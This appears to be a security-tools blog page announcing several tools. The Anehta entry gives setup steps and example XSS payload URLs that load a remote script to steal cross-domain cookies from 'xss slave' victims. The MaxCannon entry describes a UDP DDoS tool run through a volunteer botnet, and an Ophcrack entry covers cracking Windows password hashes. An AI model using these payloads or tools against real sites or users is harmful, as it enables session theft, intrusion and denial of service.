Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

Advertisements

Blazer v-02 released : AMF Testing Made Easy!

Blazer is a custom AMF messages generator with fuzzing capabilities, developed as Burp Suite plugin. It is designed and implemented to make AMF testing easy, and yet allows researchers to control fully the entire security testing process.


Using Blazer, testing AMF-based applications is easier and more robust. As it is highly integrated in a well-known testing suite, web security practitioners can start to use the tool with minimal setup in few seconds.
Blazer implements a new testing approach, introduced at Black Hat USA 2012. This automated gray-box testing technique allows security researchers to improve the coverage and the effectiveness of fuzzing efforts targeting complex applications.

For further details, please refer to the original whitepaper and presentation.
Features

  • Automatic Java objects generation from method signatures via Java reflection and “best-fit” heuristics
  • Fuzzing capabilities, with customizable data pools and attack vectors
  • Ability to start, pause, restore and stop testing
  • Easy-to-use internal methods to construct custom AMF messages
  • Embedded BeanShell for manual testing
  • Highly integrated in Burp Suite
  • Support for Java server-side remoting technologies (Adobe BlazeDS, Adobe LiveCycle Data Services, GraniteDS, …)
  • Blazer has been developed in Java as a Burp Suite plugin and released under the GNU General Public License. Burp plugins are supported by both versions (free and professional) of the Burp Suite. All major operating systems (Windows, Mac, Linux) with standard Oracle JRE installed are supported by Blazer.

Download In here | Read more right here

MaxCannon

MaxCannon is a UDP Denial of Service stress tester with a twist. The tool also allows your computer to because a server for a volunteer botnet where other people with MaxCannon can connect and are under the command of the server operator. The clients that connect to this volunteer botnet can join and leave any time they want.


Commands:The two commands as the server operator are

flood <ip>
connected (shows who is connected)

Features

  • UDP Flood (DoS)
  • UDP Flood (DDoS) With Volunteer Botnet
  • Simple to Use
  • Volunteer Botnet
  • Powerful
  • Simple UI

Download in here | read more right here

crtdbg4wince – Debugger Analysis and Memory Penetration test tool

You are searching _CrtDumpMemoryLeaks(), _CrtSetReportMode() and all the well known Win32 stuff? But you don’t find it for your Windows CE or Windows Mobile native C or C++ development? Get tired of Memory Leaks? Handle Leaks? Trouble with Appverify (Application Verifier for WinCE)? Stop searching. Congratulations, you got it!

It was generated standalone (without running debugger in background) 

Features

  • can find Leaks in C or C++ Code
  • shows the file and line of the leaked object
  • jump cursor to file and line on click to the report

this Tools For Debugger Analysis and Memory Penetration test


Download Latest Version : crtdbg4wince_source.zip (142.9 kB) 

Find Other Version |

Read more In here : http://sourceforge.net/projects/crtdbg4wince

update OPHCRACK 3.4.0 (Time-Memory-Trade-Off-Crack)

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


Features :

  •     Cracks LM and NTLM Windows hashes
  •     Free tables available for Windows XP, Vista and 7
  •     Brute-force module for simple passwords
  •     Audit mode and CSV export
  •     Real-time graphs to analyze the passwords
  •     LiveCD available to simplify the cracking
  •     Loads hashes from encrypted SAM recovered from a Windows partition

Download Latest Version :
Windows :  ophcrack-win32-installer-3.4.0.exe (5.9 MB)
Unix/Linux :  ophcrack-3.4.0.tar.bz2 (279.8 kB)
For Installation And Other Version Please read here :
http://sourceforge.net/projects/ophcrack/files/ophcrack/3.4.0/

swet (sustained workload & efficiency test)

swet (sustained workload & efficiency test) is a portable benchmark for POSIX and BSD operating systems with multi-thread and multi-process capabilities and flexible, powerful report options.


Features  :

  • Uniform performance/efficiency unit across platforms
  • multi-process (daemon) capability
  • multi-thread capability
  • nanosecond / microsecond precision option
  • flexible detail selection
  • floating-point tests
  • integer tests
  • math / logic / bitwise / branch tests
  • 8-, 16-, 32-, 64-, and 128-bit tests
  • flexible test class selection
  • test sets definable by list and/or range
  • test sets may be read from file or as command-line argument
  • flexible output formatting – CSV / HTML / Framed-Table

Recent Release Notes 1.4.57 Stable 24 Apr 2012 : This release includes intereg-64 bits, and floating-point-64 and -128 bits basic arithmetic tests.

Download Latest version : http://sourceforge.net/projects/swet/files/
Read more in here : http://swet.sourceforge.net/

Coding for Penetration Testers

What sets a good penetration tester apart from an average one is the ability to adapt to the ever-changing landscape within which we live. One aspect of this adaptability is the skill to build, extend, and manipulate scripts and applications encountered in the field. Whether tools already exist to accomplish a task, or one needs to be built to take advantage of a new vulnerability, the ability to build and extend tools in a variety of scripting languages is important. Each of the first five chapters of this resource delves into a different scripting language that we may encounter while performing penetration tests.

Through investigating the core aspects of each language, either on Microsoft
platforms, or on Linux platforms such as BackTrack 5, each chapter brings to light the power and strengths of each language. We will use these strengths to build a series of scripts to help us understand the intricacies of each language, and in most cases develop a basic tool that we can use and extend while penetration testing. Whether it is through shell scripting, Python, Perl, Ruby, or PHP, we will cover the basics of each language and discuss topics such as output handling, loops and control statements, networking, and command execution. Once the core language concepts have been covered, Coding for Penetration Testers tackles the core tasks of penetration testing. While covering scanner scripting and information gathering, we will discuss tools such as Nmap and Nessus and use the scripting languages behind them to extend the capabilities of both tools. Information gathering is one of the first and most important steps of a penetration test. We don’t know what we’re attacking until we do the initial research. Chapter 8 investigates how to automate information gathering tasks to be more effective and to
have repeatable results. Once we’ve gathered the information, we’re ready to begin the offensive. Through looking at Python as an exploit delivery tool, we will discuss the basics of exploit development. Walking through building a working exploit, Chapter 9 takes us through each step of the process, from creating a Proof of Concept (POC) to creating a repeatable and extendable exploit within the Metasploit Framework.
The following descriptions provide an overview of the contents of each chapter:

  • Chapter 1: Introduction to command shell scripting
  • Chapter 2: Introduction to Python
  • Chapter 3: Introduction to Perl
  • Chapter 4: Introduction to Ruby
  • Chapter 5: Introduction to Web scripting with PHP
  • Chapter 6: Manipulating windows with PowerShell
  • Chapter 7: Scanner scripting
  • Chapter 8: Information gathering
  • Chapter 9: Exploitation scripting
  • Chapter 10: Post-Exploitation scripting

Read More In Here